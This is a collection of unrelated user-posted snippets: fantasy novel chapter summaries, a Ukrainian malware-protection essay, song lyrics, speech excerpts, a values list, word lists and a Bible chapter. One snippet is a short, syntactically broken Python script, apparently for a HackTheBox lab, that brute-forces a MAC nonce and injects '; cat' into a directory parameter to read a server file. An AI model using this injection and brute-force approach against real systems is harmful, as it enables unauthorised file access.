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ASOS - Arya 4 by poschti

The outlaws first visit Lord Lymond Lychester and then the Lady of the Leaves in search of word on Lord Beric Dondarrion's whereabouts. But none have seen him, only hearing rumors that he was dead—hanged once, killed by Vargo Hoat, Amory Lorch, and twice by Gregor Clegane. Arya heard similar rumors at Harrenhal, but Lem and Tom know that Beric is still alive.

The outlaws plan to ransom Arya at Riverrun after they meet up with Beric and Thoros of Myr. They arrive at High Heart, an ancient hill sacred to the children of the forest. Thirty-one mighty weirwoods had stood at the top of the hill, but only their stumps remained from after the Andals chopped them down. Arya can still feel the power of the place. An old dwarf woman speaks in private to Lem, Tom, and Greenbeard, but Arya overhears the conversation. The woman has dreams while sleeping among the weirwood stumps, and tells them she had dreamed of "a shadow with a burning heart killing a golden stag";[1] of "a man without a face, waiting on a swaying bridge, on his shoulder perched a drowned crow with seaweed hanging from its wings";[2] and of "a raging river and a woman that was a fish…dead with red tears on her cheeks, but when her eyes did open, I woke from terror."[3]

At Acorn Hall, Lady Smallwood informs them that Thoros had been through recently, and that Karstark men were searching for the Kingslayer. Arya and Gendry go off to the smithy, and the former apprentice explains that Thoros was a charlatan, using regular swords with wildfire to make his flaming sword. After getting in a playful fight with Gendry, Arya tears a dress given to her by Lady Smallwood. As the Brotherhood is getting ready to leave, Lady Smallwood gives Arya clothes that had belonged to her now deceased son. Embarrassed by her actions, Arya apologizes to Lady Smallwood before leaving.

ASOS - Jaime 3 by poschti

Brienne, Cleos, and Jaime are still travelling to King's Landing. They visit Maidenpool, but finding the town deserted, continue on toward Duskendale. Jaime has no success in provoking Brienne into a fight. He misses his twin and thinks back about their childhood. Even as children they were close and they slept together. Once their mother caught them. She was shocked and moved Jaime's bedchamber far away from Cersei's. Jaime muses that he should marry his sister as the Targaryens did.

Suddenly they are attacked by archers. Jaime and Brienne charge at them and the archers run away in the forest. They go back to find that ser Cleos is dead. His horse threw him off but as his feet was stuck in the stirrups he was dragged with his head bouncing against the ground. Jaime takes Cleos's sword and attacks Brienne. Although he is still chained he is confident that he can beat her. They fight for a long time. Jaime is amazed at her skill with the sword and realizes that she is stronger than him. Finally Brienne beats him.

Zollo cuts off Jaime's sword hand, by Joao Bosco © Fantasy Flight Games
When they look up a number of men surround them. Jaime recognizes them as the Brave Companions. They quickly inform him that they have gone over to the Starks. Jaime and Brienne are severely beaten and taken prisoner. Jaime warns Brienne that she will be raped and advises her not to resist, as this will make it worse. He tries to save her by telling the Brave Companions that Tarth is called the Sapphire Isle and that Brienne will be worth a high ransom. He tries to persuade the leader of the Brave Companions, Vargo Hoat in releasing them for a high ransom. Vargo Hoat replies that he will give Jaime's father a message. His men grab Jaime and hold him down. Zollo raises his sword and brings it down as Jaime screams.

ASOS - Catelyn 3 by poschti

Robb stands with all his bannermen attending as the bodies of Willem Lannister and Tion Frey are laid before him. The Greatjon brings Lord Rickard Karstark and four of his men to Robb as prisoners.

Rickard, who was overcome with grief and anger, sought vengeance for the loss of his two sons. After Catelyn released Ser Jaime Lannister from captivity, he and his men murdered Willem Lannister and Tion Frey in their cells at Riverrun, killing the guards Delp and Elwood in the process.

Robb orders Rickard's accomplices to be hanged and sentences Rickard to death, knowing that he must perform the execution himself, as both the Starks and Karstarks are descended from the First Men.

The rest of the Karstark men had already departed Riverrun to seek out and kill Jaime Lannister, also offering gold and the hand of Rickard's daughter, Alys, in marriage to anyone who could turn the Kingslayer over to them.

Edmure urges Robb to hold Lord Karstark hostage and not to let word get out to the Freys or Lannisters about the deaths of the two squires. Robb feels he has been betrayed by the murder, however, and has no choice but to kill the man whose two sons died defending his life.

Robb carries out the sentence in the rainy godswood of Riverrun the next morning, beheading Rickard before the heart tree. That night, Jeyne comes to Catelyn for advice in comforting Robb, and the young woman promises that she will soon bear Robb's son if the gods answer her prayers.

comp-mal-p3 by user109451

Не менш важливим аспектом захисту є підтримка операційної системи та прикладного програмного забезпечення в актуальному стані. Розробники постійно випускають оновлення безпеки, які усувають виявлені вразливості та закривають потенційні шляхи проникнення шкідливого ПЗ. Рекомендується налаштувати автоматичне оновлення операційної системи та регулярно перевіряти наявність оновлень для встановлених програм.
Обережність при роботі з електронною поштою та веб-сайтами також є ключовим елементом захисту. Значна частина шкідливого ПЗ розповсюджується через фішингові листи та заражені веб-сторінки. Користувачам слід уважно перевіряти джерело електронних листів, не відкривати підозрілі вкладення та не переходити за сумнівними посиланнями. При відвідуванні веб-сайтів варто звертати увагу на наявність захищеного з'єднання (HTTPS) та уникати завантаження файлів з ненадійних джерел.
Використання брандмауера (файрвола) є ще одним важливим кроком у забезпеченні безпеки персонального комп'ютера. Брандмауер контролює вхідний та вихідний мережевий трафік, блокуючи несанкціоновані спроби доступу до комп'ютера. Більшість сучасних операційних систем мають вбудовані брандмауери, які слід тримати активованими та правильно налаштованими для максимального захисту.

comp-mal-p2 by user109451

Одним з основних методів захисту персональних комп'ютерів від шкідливого програмного забезпечення є встановлення та регулярне оновлення антивірусного програмного забезпечення. Сучасні антивірусні програми здатні виявляти та нейтралізувати широкий спектр загроз, включаючи нові та невідомі види шкідливого ПЗ. Важливо обирати надійне антивірусне рішення від перевірених виробників та налаштувати його на автоматичне оновлення та регулярне сканування системи.

comp-mal-p1 by user109451

Інформаційна безпека є надзвичайно важливою складовою сучасного цифрового світу. В умовах постійного розвитку інформаційних технологій та зростання кількості кіберзагроз, захист персональних даних та комп'ютерних систем стає першочерговим завданням для кожного користувача. Шкідливе програмне забезпечення, таке як віруси, трояни та шпигунські програми, може завдати серйозної шкоди як окремим користувачам, так і цілим організаціям, викрадаючи конфіденційну інформацію та порушуючи роботу систем.

ASOS - Tyrion 3 by poschti

The small council meets to discuss the progress of the war, and Tyrion learns that Lancel is still near death. Randyll Tarly defeated the northmen attacking Duskendale, with Helman Tallhart reported dead, and Robett Glover fleeing west and being chased by Gregor Clegane.

Tywin informs them that Daven Lannister is rounding up a new army and will join with men from the Golden Tooth, and then march on Riverrun when Robb Stark returns north. They all agree that Robb will march for Moat Cailin, for he is a king without a kingdom.

Kevan reveals that Balon Greyjoy has sent letters with terms of alliance. Greyjoy wants the North, but Tywin says they will not treat with Balon while other options may present themselves. Littlefinger agrees to go to the Eyrie to marry Lysa Arryn, and once he is consort, deliver the Vale of Arryn into Tywin's hands.

Since Littlefinger will be leaving within a day, Tyrion is named master of coins. Pycelle informs them that 300 Dornishmen ride for King's Landing in response to Tyrion's negotiations, despite the hatred between Dorne and Highgarden that has gone on for hundreds of years.

Mace Tyrell does not like the idea of Dornishmen riding across the Reach. Tyrion considers how the Lord of Highgarden talked like a general although he had never won a decisive battle. His victory over Robert Baratheon at Ashford was won by Randyll Tarly and the siege of Storm's End lasted for a year without result until Eddard Stark relieved the castle.

Garlan Tyrell has been named Lord of Brightwater Keep since Alester Florent is a traitor. Varys brings word of a three-headed dragon being born in Qarth, and that the Night's Watch is begging for help against a wildling army. Lord Tywin does not want to hear about rumors of dragons, and is disinterested in news of wildlings, claiming that if the Wall is overrun, the Starks and Greyjoys will have a new enemy to deal with, even speculating they may be able to make a deal with Mance Rayder, overriding the attempts of Varys and Tyrion to have gold cloaks who deserted during the Battle of the Blackwater forced to take the black. He adjourns the meeting, asking Tyrion, Cersei and Kevan to stay.

Tyrion warns them not to trust Littlefinger with this quest to the Vale, but Tywin is resolute, believing it better to have Baelish ruling the Vale as opposed to the likes of Yohn Royce or Lyn Corbray and adds that Littlefinger has proven his loyalty, telling Tyrion that just the other day Baelish informed them of a plot by the Tyrells to bring Sansa to Highgarden and marry her to Willas.

The Hand is aware that should Mace Tyrell ask leave to bring Sansa to Highgarden, they must consent or else offend the Tyrells. Tywin wishes to circumvent this problem by offering Cersei's hand in marriage to Willas. Cersei adamantly refuses but her father has the final say, and Cersei storms out of the room in a fury. Tywin then tells Tyrion that he will wed Sansa Stark, further solidifying the Lannisters's position, because should Robb die and Sansa and Tyrion have a son, the child will become Lord of Winterfell.

Tyrion protests, arguing that a marriage to Sansa is worthless while the Greyjoys hold the north and questions why he isn't being forced into a marriage with Balon's daughter, but Tywin counters that the ironborn won't rule the north, they will just plunder it, uniting the northmen against them, which the Lannisters can use to retake the north when Tyrion brings Ned Stark's grandson home to claim his birthright. Tyrion argues again, protesting that Sansa is still a child, but Tywin retorts with Cersei's testimony the girl has flowered.

Tyrion suggests sending the girl back to her mother as a gesture of goodwill that might make Robb Stark bend the knee, but Tywin coldly retorts that if they do that, Sansa will be married off to one of the northern or Riverlords to shore up her brother's alliances.

Tywin adds that this marriage is a reward for Tyrion's previous service and threatens that if Tyrion won't go through with it, they will marry Sansa off to Lancel or another of his cousins and find Tyrion another bride; the threat of being married to Lollys Stokeworth, as well as the prospect of being made Lord of Winterfell if he is to be denied Casterly Rock is enough to cow Tyrion.

As a last attempt at protest, Tyrion argues that any claim Sansa might have to Winterfell will be made irrelevant when her brother gets a child from whichever Frey girl he marries, and learns to his surprise that Robb Stark has broken his pledge with the Freys and married Jeyne Westerling.

Ser Kevan reveals that Lord Westerling's wife is a Spicer, a house of extremely low birth having descended from traders. Tyrion is confused by the lack of fury in his father's eyes at this betrayal by the Westerlings, a house sworn to Casterly Rock. Lord Tywin states, "Jeyne Westerling is her mother's daughter, and Robb Stark is his father's son."

la montagne by user109521

Ils quittent un à un le pays pour s'en aller gagner leur vie. Loin de la terre où ils sont nés. Depuis longtemps ils en rêvaient de la ville et
de ses secrets, du formica et du ciné. Les vieux ça n'était pas original quand ils s'essuyaient machinal d'un revers de manche les lèvres. Mais ils savaient tous à propos. Tuer la caille ou le perdreau et manger la tomme de chèvre

la montagne by user109521

Ils quittent un à un le pays pour s'en aller gagner leur vie. Loin de la terre où ils sont nés. Depuis longtemps ils en rêvaient de la ville et
de ses secrets, du formica et du ciné. Les vieux ça n'était pas original quand ils s'essuyaient machinal d'un revers de manche les lèvres. Mais ils savaient tous à propos. Tuer la caille ou le perdreau et manger la tomme de chèvre

la montagne by user109521

Ils quittent un à un le pays
Pour s'en aller gagner leur vie
Loin de la terre où ils sont nés
Depuis longtemps ils en rêvaient
De la ville et de ses secrets
Du formica et du ciné
Les vieux ça n'était pas original
Quand ils s'essuyaient machinal
D'un revers de manche les lèvres
Mais ils savaient tous à propos
Tuer la caille ou le perdreau
Et manger la tomme de chèvre

JFK Begin Anew by swagstaff

So let us begin anew; remembering on both sides that civility is not a sign of weakness, and sincerity is always subject to proof. Let us never negotiate out of fear, but let us never fear to negotiate. Let both sides explore what problems unite us instead of belaboring those problems which divide us.

Steve Jobs Fired by swagstaff

And then I got fired. How can you get fired from a company you started? Well, as Apple grew we hired someone who I thought was very talented to run the company with me, and for the first year or so things went well. But then our visions of the future began to diverge and eventually we had a falling out. When we did, our Board of Directors sided with him. And so at 30, I was out. And very publicly out. What had been the focus of my entire adult life was gone, and it was devastating.

I Have a Dream by swagstaff

I have a dream that one day this nation will rise up and live out the true meaning of its creed: "We hold these truths to be self-evident, that all men are created equal."

Values by

A List of Important Values with Explanations
* Acceptance: Embracing oneself and others without judgment is essential for fostering healthy relationships and personal growth.
* Exploration: A curious and open mind allows for personal development, learning, and discovery.
* Present: Living in the present moment helps reduce stress and anxiety, allowing for a more fulfilling life.
* Accomplishment: Achieving goals and overcoming challenges provides a sense of purpose and satisfaction.
* Expressive: Communicating thoughts and feelings openly and honestly promotes healthy relationships and self-understanding.
* Productivity: Being productive and efficient allows for more time to pursue personal and professional goals.
* Accountability: Taking responsibility for one's actions is essential for building trust and integrity.
* Fairness: Treating others with equality and respect is fundamental to building strong relationships and a just society.
* Professionalism: Maintaining a high standard of conduct and performance in one's work is crucial for success.
* Accuracy: Being precise and careful in one's work is essential for achieving quality results.

* Family: Strong family bonds provide support, love, and a sense of belonging.
* Prosperity: Having a comfortable and secure life allows for personal growth and happiness.
* Achievement: Achieving goals and overcoming challenges provides a sense of accomplishment and satisfaction.
* Famous: Being recognized and admired for one's achievements can provide a sense of pride and fulfillment.
* Purpose: Having a clear sense of purpose and direction in life can provide motivation and meaning.
* Adaptability: Being able to adjust to change and new situations is essential for success and personal growth.
* Fearless: Overcoming fear and taking risks can lead to personal growth and achievement.
* Quality: Striving for excellence in all aspects of life can lead to greater satisfaction and fulfillment.

* Alertness: Being aware and attentive to one's surroundings and the needs of others is important for building strong relationships and making good decisions.
* Feelings: Recognizing and expressing one's emotions is essential for emotional health and well-being.
* Realistic: Being grounded in reality and setting achievable goals is important for success and avoiding disappointment.
* Altruism: Helping others without expecting anything in return is a noble and fulfilling act.
* Ferocious: Having a strong and determined spirit can help one overcome challenges and achieve goals.
* Reason: Using logic and critical thinking to make informed decisions is essential for success.

* Ambition: Having a strong desire to succeed and achieve goals can be a powerful motivator.
* Fidelity: Being loyal and faithful to one's commitments and relationships is essential for building trust and respect.
* Recognition: Appreciating and acknowledging the achievements of others is important for building strong relationships and fostering a positive work environment.
* Amusement: Enjoying life and finding humor in everyday situations can help reduce stress and improve overall well-being.
* Focus: Being able to concentrate and stay on task is essential for achieving goals and success.
* Recreation: Engaging in activities that one enjoys can help reduce stress, improve mood, and maintain a healthy work-life balance.

* Assertiveness: Expressing oneself confidently and respectfully is important for building strong relationships and achieving goals.
* Foresight: Planning ahead and considering future consequences can help one make informed decisions.
* Reflective: Taking time to think about one's thoughts, feelings, and actions can lead to personal growth and self-awareness.
* Attentive: Paying attention to others and their needs is essential for building strong relationships and fostering a positive work environment.
* Fortitude: Showing courage and perseverance in the face of adversity is essential for success.
* Respect: Treating others with dignity and consideration is fundamental to building strong relationships and a positive work environment.

* Awareness: Being conscious of one's thoughts, feelings, and actions is essential for personal growth and well-being.
* Freedom: Having the ability to make choices and pursue one's own goals is essential for personal fulfillment.
* Responsibility: Taking responsibility for one's actions is essential for building trust and integrity.
* Balance: Finding a healthy balance between work, play, and rest is essential for overall well-being.
* Friendship: Having strong and supportive friendships can provide a sense of belonging and happiness.
* Restraint: Being able to control one's impulses and desires is important for making good decisions and avoiding negative consequences.
* Beauty: Appreciating the beauty in the world can bring joy and fulfillment.
* Fun: Enjoying life and finding humor in everyday situations can help reduce stress and improve overall well-being.
* Results-oriented: Focusing on achieving goals and outcomes can be a powerful motivator.
* Boldness: Having the courage to take risks and pursue one's dreams is essential for success.

* Generosity: Giving freely of one's time, resources, and kindness is a noble and fulfilling act.
* Reverence: Having a deep respect and appreciation for things that are sacred or important is essential for a meaningful life.
* Bravery: Showing courage and fearlessness in the face of adversity is essential for success.
* Genius: Having exceptional intelligence and creativity can lead to great achievements.
* Rigor: Being disciplined and committed to one's goals is essential for success.
* Brilliance: Being exceptionally talented and intelligent can lead to great achievements.
* Giving: Sharing with others is a fundamental human value that can bring joy and fulfillment.
* Calm: Maintaining a sense of peace and tranquility can help reduce stress and improve overall well-being.
* Goodness: Being kind, compassionate, and helpful is essential for building strong relationships and a positive impact on the world.
* Candor: Being honest and direct in one's communication is important for building trust and respect.

* Grace: Showing kindness, compassion, and forgiveness is essential for building strong relationships and a positive attitude.
* Security: Feeling safe and protected can provide a sense of peace and well-being.
* Capable: Being able to accomplish tasks and overcome challenges is essential for success.
* Gratitude: Expressing appreciation for the good things in one's life can improve overall happiness and well-being.
* Self-reliance: Being independent and capable of taking care of oneself is essential for personal growth and fulfillment.
* Careful: Being attentive and thoughtful is important for making good decisions and avoiding mistakes.
* Greatness: Striving for excellence and achieving significant accomplishments can be a powerful motivator.
* Selfless: Putting the needs of others before one's own is a noble and fulfilling act.
* Certainty: Having confidence and belief in oneself is essential for success.
* Growth: Continuously learning and developing as a person is essential for personal growth and fulfillment.

* Sensitivity: Being aware and responsive to the needs and feelings of others is essential for building strong relationships.
* Challenge: Overcoming challenges and obstacles can lead to personal growth and development.
* Serenity: Finding peace and tranquility in one's life can improve overall well-being.
* Charity: Giving generously to others is a noble and fulfilling act.
* Hard work: Putting in effort and dedication is essential for achieving goals and success.
* Service: Helping others and making a positive contribution to the world is a fulfilling way to live.
* Cleanliness: Maintaining a clean and organized environment can contribute to a sense of peace and well-being.
* Harmony: Living in peace and agreement with others is essential for building strong relationships and a harmonious society.
* Sharing: Sharing experiences, ideas, and resources with others can foster a sense of community and belonging.
* Clear: Being clear and concise in one's communication is essential for effective communication and understanding.

* Clever: Being intelligent and resourceful can help one overcome challenges and achieve goals.
* Honesty: Being truthful and sincere in one's dealings with others is essential for building trust and respect.
* Silence: Sometimes, the best way to communicate is to listen and be present.
* Comfort: Feeling safe and secure can provide a sense of peace and well-being.
* Honor: Upholding one's commitments and values is essential for integrity and character.
* Simplicity: Living a simple and uncluttered life can reduce stress and improve overall well-being.
* Commitment: Being dedicated and determined to achieve one's goals is essential for success.
* Hope: Believing in a positive future can provide motivation and inspiration.
* Sincerity: Being genuine and authentic in one's interactions with others is essential for building trust and respect.
* Common sense: Using practical judgment and understanding to make decisions is essential for success.

* Humility: Being modest and humble can help one avoid arrogance and build strong relationships.
* Skill: Being proficient and competent in one's abilities is essential for success.
* Skillfulness: Having a high level of expertise and ability is essential for achieving excellence.
* Community: Being part of a supportive and caring community can provide a sense of belonging and happiness.
* Imagination: Being creative and imaginative can help one find new and innovative solutions to problems.
* Smart: Being intelligent and resourceful can help one overcome challenges and achieve goals.

election by wishpath

every years Tuesday help state's President because candidate your candidate's

It'll Get Better... by kitt-katt-31

Nothing usually goes right for me; however I know that I am trying my best. I am trying my absolute best to make sure that everything is taken care of. I do feel like I'm working for nothing, but it's going to get better. That's what I keep telling myself. It'll get better, it's going to get better, things have got to get better... right?

sdf by nihalkhan825

health yoga taichi keepfit salad bar vegetarian outdoor activities leisure time
disease meal protein balanced diet food pyramid vitamin carbohydrates rice
pasta potatoes pizza tomatoes bread cereals minerals zinc meat seafood eggs
beans milk cheese yoghurt fruit vegetables citrus fruits green pepper blackcurrant
nuts egg yolk liver medicine، treatment remedy nursing care nursery regular exercise

nature field footbridge environment waterfall river mountain forest village
coast reef lake valley hill cliff island peninsula earthquake avalanche tornado
typhoon desertification volcano disaster catastrophe erosion landslides storm
flood hurricane pond jungle oasis dam canyon

the environment greenhouse effect acid rain global warming carbon dioxide
burning fossil exhaust fumes deforestation nitrogen oxide smog climate pollution
temperature power plants landfill cattle wind turbine soar power hydroelectric
power renewable source of energy reliable solar panels environmentally friendly
oxygen chemical free desert degradation vegetation sea level ocean currents soil
conditioner coal fossil fuels firewood drought contaminated

Ephesians 1 by morellanthony

1 Paul, an apostle of Christ Jesus by the will of God, To the saints who are in Ephesus, and are faithful in Christ Jesus: 2 Grace to you and peace from God our Father and the Lord Jesus Christ.
Spiritual Blessings in Christ.

3 Blessed be the God and Father of our Lord Jesus Christ, who has blessed us in Christ with every spiritual blessing in the heavenly places, 4 even as he chose us in him before the foundation of the world, that we should be holy and blameless before him. In love 5 he predestined us[b] for adoption to himself as sons through Jesus Christ, according to the purpose of his will, 6 to the praise of his glorious grace, with which he has blessed us in the Beloved. 7 In him we have redemption through his blood, the forgiveness of our trespasses, according to the riches of his grace, 8 which he lavished upon us, in all wisdom and insight 9 making known[c] to us the mystery of his will, according to his purpose, which he set forth in Christ 10 as a plan for the fullness of time, to unite all things in him, things in heaven and things on earth.

11 In him we have obtained an inheritance, having been predestined according to the purpose of him who works all things according to the counsel of his will, 12 so that we who were the first to hope in Christ might be to the praise of his glory. 13 In him you also, when you heard the word of truth, the gospel of your salvation, and believed in him, were sealed with the promised Holy Spirit, 14 who is the guarantee[d] of our inheritance until we acquire possession of it,[e] to the praise of his glory.

15 For this reason, because I have heard of your faith in the Lord Jesus and your love[f] toward all the saints, 16 I do not cease to give thanks for you, remembering you in my prayers, 17 that the God of our Lord Jesus Christ, the Father of glory, may give you the Spirit of wisdom and of revelation in the knowledge of him, 18 having the eyes of your hearts enlightened, that you may know what is the hope to which he has called you, what are the riches of his glorious inheritance in the saints, 19 and what is the immeasurable greatness of his power toward us who believe, according to the working of his great might 20 that he worked in Christ when he raised him from the dead and seated him at his right hand in the heavenly places, 21 far above all rule and authority and power and dominion, and above every name that is named, not only in this age but also in the one to come. 22 And he put all things under his feet and gave him as head over all things to the church, 23 which is his body, the fullness of him who fills all in all.

htb adv exploit by morellanthony

import requests

URL = ""
COOKIES = {"PHPSESSID": "8a55e7sscm1lhrqvb2etklhrih"}

DIR = "/home/htb-stdnt/; cat /hmackey.txt" # Change this each succession
MAC = 0
MAX_NONCE = 20000

def prepare_params(nonce):
return {
"dir": DIR,
"nonce": nonce,
"mac": MAC

def make_request(nonce):
return requests.get(URL, cookies=COOKIES, params=prepare_params(nonce))

# main
for n in range(MAX_NONCE):
r = make_request(n)

if not "Error! Invalid MAC" in r.text:
print("Found valid MAC:")

Untitled by kitt-katt-31

Life is funny. Life throws us curve balls better than some of the world's greatest pitchers. Life has ups, downs, and even full circles of events that will always either make us super happy, bring us down, make us angry, make us depressed, and even just bring peace and calm to us. We just have to keep moving no matter what life throws at us.

This world is going to keep spinning, life keeps going, and we are always going to have moments in our life that either we are going to want to move on with the next phase of our lives, or we are going to want to stay right where we are at. So, just remember that when you think that you're better off not being here because you are. We can either buck up and make a better life for ourselves, or we can stay content with where we are at. But failing is not an option because life is too short to stay unhappy for the time of it. Do what you got to do to make it happen.